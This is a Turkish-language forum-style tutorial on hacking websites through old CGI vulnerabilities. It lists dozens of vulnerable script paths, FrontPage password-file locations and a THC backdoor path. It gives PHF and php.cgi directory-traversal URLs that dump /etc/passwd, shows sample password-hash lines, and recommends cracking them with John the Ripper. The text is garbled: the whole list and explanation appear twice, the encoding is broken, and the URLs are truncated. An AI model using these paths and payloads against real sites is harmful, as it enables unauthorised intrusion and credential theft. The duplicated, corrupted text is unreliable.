Cgi açıkları ile wep site hacklemek
aglimpse > /cgi-bin/aglimpse
AnyForm2 > /cgi-bin/AnyForm2
args.bat > /cgi-dos/args.bat
AT-admin > /cgi-bin/AT-admin.cgi
bnbform.cgi > /cgi-bin/bnbform.cgi
campas > /cgi-bin/campas
carbo.dll > /carbo.dll
CGImail.exe > /scripts/CGImail.exe
cgiwrap > /cgi-bin/cgiwrap
classifieds.cgi > /cgi-bin/classifieds.cgi
Count.cgi > /cgi-bin/Count.cgi
displayopenedfile.cfm > /cfdocs/expelval/displayopenedfile.cfm
docs/codebrws.asp > /iissamples/sdk/asp/docs/codebrws.asp
edit.pl > /cgi-bin/edit.pl
environ.cgi > /cgi-bin/environ.cgi
exprcalc.cfm > /cfdocs/expelval/exprcalc.cfm
Fax Survey > /cgi-bin/faxsurvey
filemail.pl > /cgi-bin/filemail.pl
files.pl > /cgi-bin/files.pl
Finger > /cgi-bin/finger
fpcount.exe > /scripts/fpcount.exe
glimpse > /cgi-bin/glimpse
guestbook.cgi > /cgi-bin/guestbook.cgi
Handler > /cgi-bin/handler
howitworks/codebrws.asp > /iissamples/exair/howitworks/codebrws.asp
HTML scri*t > /cgi-bin/htmlscript
HTIMAGE > cgi-bin/htimage.exe
info2www > /cgi-bin/info2www
issadmin/bir.htr > /scripts/issadmin/bdir.htr
jj > /cgi-bin/jj
maillist.pl > /cgi-bin/maillist.pl
man.sh > /cgi-bin/man.sh
newdsn.exe > /scripts/tools/newdsn.exe
nph-publish > /cgi-bin/nph-publish
nph-test-cgi > /cgi-bin/nph-test-cgi
openfile.cfm > /cfdocs/expelval/openfile.cfm
perl.exe > /cgi-bin/perl.exe
perlshop.cgi > /cgi-bin/perlshop.cgi
PF Display > /cgi-bin/pfdispaly.cgi
PHF > /cgi-bin/phf
PHP > /cgi-bin/php.cgi
rguest.exe > /cgi-bin/rguest.exe
search97.vts > /search97.vts
sendmail.cfm > /cfdocs/expelval/sendmail.cfm
showcode.asp > /msads/Samples/SELECTOR/showcode.asp
survey.cgi > /cgi-bin/survey.cgi
Test-CGI > /cgi-bin/test-cgi
textcounter.pl > /cgi-bin/textcounter.pl
THC - Backdoor > /cgi-bin/rwwwshell.pl
uploader.exe > /cgi-win/uploader.exe
view-source > /cgi-bin/view-source
view-source > /cgi-bin/view-source
VTI BIN [shtml.dll] > /_vti_bin/shtml.dll
VTI BIN [shtml.exe] > /_vti_bin/shtml.exe
VTI INF [_vti_inf.html] > /_vti_inf.html
VTI PVT [administrators.pwd] > /_vti_pvt/administrators.pwd
VTI PVT [authors.pwd] > /_vti_pvt/authors.pwd
VTI PVT [service.pwd] > /_vti_pvt/service.pwd
VTI PVT [users.pwd] > /_vti_pvt/users.pwd
Web Sendmail > /cgi-bin/websendmail
webdist.cgi > /cgi-bin/webdist.cgi
WebGais > /cgi-bin/webgais
wguest.exe > /cgi-bin/wguest.exe
wrap > /cgi-bin/wrap
www-sql > /cgi-bin/www-sql
wwwboard.pl > /cgi-bin/wwwboard.pl
2. Yol :
Manuel olarak aramak yerine iþimizi kolaylaþtýrmak için bir CGI Scanner kullanabiliriz. Not: CGI'larý aradýðýnýz sitede bulursanýz bunu çalýþtýran exploit'i de bulmanýz gerekir. Þimdi diyelim ki iki yoldan birini kullanarak PHF açýðýný bulduk. Bunu þöyle kullanýrýz: http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd
slasher:VTNaA6DjT/9ME:1603:100:,[email protected],,:/home/ slasher:/bin/bashpar
mcgreen:ryKOFkUDiGO3A:1604:100:,[email protected],,:/h ome/mcgreen:/bin/bashpar
abi98:cUp.uUzNzr8YY:1605:100:,[email protected],, :/home/abi98:/bin/bashpar
henner_:ziprJNh85rk.o:1606:100:,[email protected],,:/home/henne r_:/bin/bashpar
Çýkan password'larý bir password cracker ile kýrabilirsiniz (John The Ripper tavsiye edilir.) Manuel olarak veya bir program yardýmýyla hack etmek istediðimiz sayfada service.pwd varsa ne yapacaðýz? http://www.domain.com/_vti_pvt/services.pwd
yazarýz. Ýþte bir de PHP CGI örneði: http://www.domain.com/cgi-bin/php.c..../../etc/passwd Bu örneklere bakarak olayýn mantýðýný biraz da olsa kavrayabilirsiniz. Bug'ý bulduktan sonra exploit'ini bulup veya yazýp çalýþtýrmanýz gerek. yazarýz. Tabi çýkan dosya etc içindeki username ve password'lerin olduðu password dosyasý olacaktýr. Þu þekilde:
aglimpse > /cgi-bin/aglimpse
AnyForm2 > /cgi-bin/AnyForm2
args.bat > /cgi-dos/args.bat
AT-admin > /cgi-bin/AT-admin.cgi
bnbform.cgi > /cgi-bin/bnbform.cgi
campas > /cgi-bin/campas
carbo.dll > /carbo.dll
CGImail.exe > /scripts/CGImail.exe
cgiwrap > /cgi-bin/cgiwrap
classifieds.cgi > /cgi-bin/classifieds.cgi
Count.cgi > /cgi-bin/Count.cgi
displayopenedfile.cfm > /cfdocs/expelval/displayopenedfile.cfm
docs/codebrws.asp > /iissamples/sdk/asp/docs/codebrws.asp
edit.pl > /cgi-bin/edit.pl
environ.cgi > /cgi-bin/environ.cgi
exprcalc.cfm > /cfdocs/expelval/exprcalc.cfm
Fax Survey > /cgi-bin/faxsurvey
filemail.pl > /cgi-bin/filemail.pl
files.pl > /cgi-bin/files.pl
Finger > /cgi-bin/finger
fpcount.exe > /scripts/fpcount.exe
glimpse > /cgi-bin/glimpse
guestbook.cgi > /cgi-bin/guestbook.cgi
Handler > /cgi-bin/handler
howitworks/codebrws.asp > /iissamples/exair/howitworks/codebrws.asp
HTML scri*t > /cgi-bin/htmlscript
HTIMAGE > cgi-bin/htimage.exe
info2www > /cgi-bin/info2www
issadmin/bir.htr > /scripts/issadmin/bdir.htr
jj > /cgi-bin/jj
maillist.pl > /cgi-bin/maillist.pl
man.sh > /cgi-bin/man.sh
newdsn.exe > /scripts/tools/newdsn.exe
nph-publish > /cgi-bin/nph-publish
nph-test-cgi > /cgi-bin/nph-test-cgi
openfile.cfm > /cfdocs/expelval/openfile.cfm
perl.exe > /cgi-bin/perl.exe
perlshop.cgi > /cgi-bin/perlshop.cgi
PF Display > /cgi-bin/pfdispaly.cgi
PHF > /cgi-bin/phf
PHP > /cgi-bin/php.cgi
rguest.exe > /cgi-bin/rguest.exe
search97.vts > /search97.vts
sendmail.cfm > /cfdocs/expelval/sendmail.cfm
showcode.asp > /msads/Samples/SELECTOR/showcode.asp
survey.cgi > /cgi-bin/survey.cgi
Test-CGI > /cgi-bin/test-cgi
textcounter.pl > /cgi-bin/textcounter.pl
THC - Backdoor > /cgi-bin/rwwwshell.pl
uploader.exe > /cgi-win/uploader.exe
view-source > /cgi-bin/view-source
view-source > /cgi-bin/view-source
VTI BIN [shtml.dll] > /_vti_bin/shtml.dll
VTI BIN [shtml.exe] > /_vti_bin/shtml.exe
VTI INF [_vti_inf.html] > /_vti_inf.html
VTI PVT [administrators.pwd] > /_vti_pvt/administrators.pwd
VTI PVT [authors.pwd] > /_vti_pvt/authors.pwd
VTI PVT [service.pwd] > /_vti_pvt/service.pwd
VTI PVT [users.pwd] > /_vti_pvt/users.pwd
Web Sendmail > /cgi-bin/websendmail
webdist.cgi > /cgi-bin/webdist.cgi
WebGais > /cgi-bin/webgais
wguest.exe > /cgi-bin/wguest.exe
wrap > /cgi-bin/wrap
www-sql > /cgi-bin/www-sql
wwwboard.pl > /cgi-bin/wwwboard.pl
2. Yol :
Manuel olarak aramak yerine iþimizi kolaylaþtýrmak için bir CGI Scanner kullanabiliriz. Not: CGI'larý aradýðýnýz sitede bulursanýz bunu çalýþtýran exploit'i de bulmanýz gerekir. Þimdi diyelim ki iki yoldan birini kullanarak PHF açýðýný bulduk. Bunu þöyle kullanýrýz: http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd
slasher:VTNaA6DjT/9ME:1603:100:,[email protected],,:/home/ slasher:/bin/bashpar
mcgreen:ryKOFkUDiGO3A:1604:100:,[email protected],,:/h ome/mcgreen:/bin/bashpar
abi98:cUp.uUzNzr8YY:1605:100:,[email protected],, :/home/abi98:/bin/bashpar
henner_:ziprJNh85rk.o:1606:100:,[email protected],,:/home/henne r_:/bin/bashpar
Çýkan password'larý bir password cracker ile kýrabilirsiniz (John The Ripper tavsiye edilir.) Manuel olarak veya bir program yardýmýyla hack etmek istediðimiz sayfada service.pwd varsa ne yapacaðýz? http://www.domain.com/_vti_pvt/services.pwd
yazarýz. Ýþte bir de PHP CGI örneði: http://www.domain.com/cgi-bin/php.c..../../etc/passwd Bu örneklere bakarak olayýn mantýðýný biraz da olsa kavrayabilirsiniz. Bug'ý bulduktan sonra exploit'ini bulup veya yazýp çalýþtýrmanýz gerek. yazarýz. Tabi çýkan dosya etc içindeki username ve password'lerin olduðu password dosyasý olacaktýr. Þu þekilde: